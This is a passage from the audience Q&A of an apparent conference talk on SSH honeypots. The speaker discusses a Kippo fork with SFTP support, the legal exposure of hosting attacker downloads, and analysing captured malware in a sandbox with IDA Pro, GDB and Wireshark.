Yes. So the only interaction that I've had with other honeypotters is mainly independent researchers, but I would imagine that there are enterprises that are doing that. It sounds like a really, really good idea. So I personally have not, no, but it sounds like a great idea. There was another question? No? Any other questions? Yes.
So I mean, if they're downloading illegal content, yeah, I guess I could get in trouble. So they're obviously able to download, but they have to actually get... I'm sorry. No, but you can. I'm not personally, no, but the fork of Kippo that I use does support SFTP, and so you can do that. That's a good question. Do you have a question,
someone? Yeah, for sure, and that's my favorite part about honeypotting actually. I didn't go super into it because I figured not a lot of people here have used honeypots, and that was the case. But Andrew Morris, the guy that I pointed out here, he's really good at that, well, a lot better than me anyway, and he and I will go through a lot of malware together. He has an IDA Pro license; I usually just use GDB. And then we may even execute it in a sandbox environment and run
Wireshark and see where it's calling out to and stuff like that. So yeah, I've dabbled in it, definitely not super good at it though. Any other questions? All right, thank you very much. [Applause]